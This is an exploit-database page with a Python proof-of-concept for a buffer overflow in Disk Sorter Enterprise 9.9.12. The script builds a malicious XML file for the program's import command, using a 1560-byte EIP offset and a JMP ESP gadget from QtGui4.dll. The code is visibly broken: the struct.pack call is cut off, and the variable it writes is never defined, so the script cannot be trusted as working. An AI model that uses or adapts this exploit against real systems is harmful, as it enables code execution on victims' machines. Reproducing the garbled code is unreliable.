Disk Sorter Enterprise 9.9.12 Buffer Overflow



EKU-ID: 6865 CVE: OSVDB-ID:
Author: Anurag Srivastava Published: 2017-08-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
 
# Exploit Title	    : Disk Sorter Enterprise v9.9.12 - 'Import Command' Buffer Overflow 
# Discovery by      : Anurag Srivastava
# Email             : anurag.srivastava@pyramidcyber.com
# Website 	    : www.pyramidcyber.com
# Discovery Date    : 21/08/2017
# Software Link     : http://www.disksorter.com/setups/disksorterent_setup_v9.9.12.exe
# Tested Version    : 9.9.12
# Tested on OS      : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the python file to generate pyramid.xml and then open disk pulse software , right click and click on import command . Select pyramid.xml file .
 
import os,struct
 
#offset to eip
junk = "A" * (1560)

#JMP ESP (QtGui4.dll)
jmp1 = struct.pack(''
 
f = open('pyramid.xml', 'w')
f.write(file)
f.close()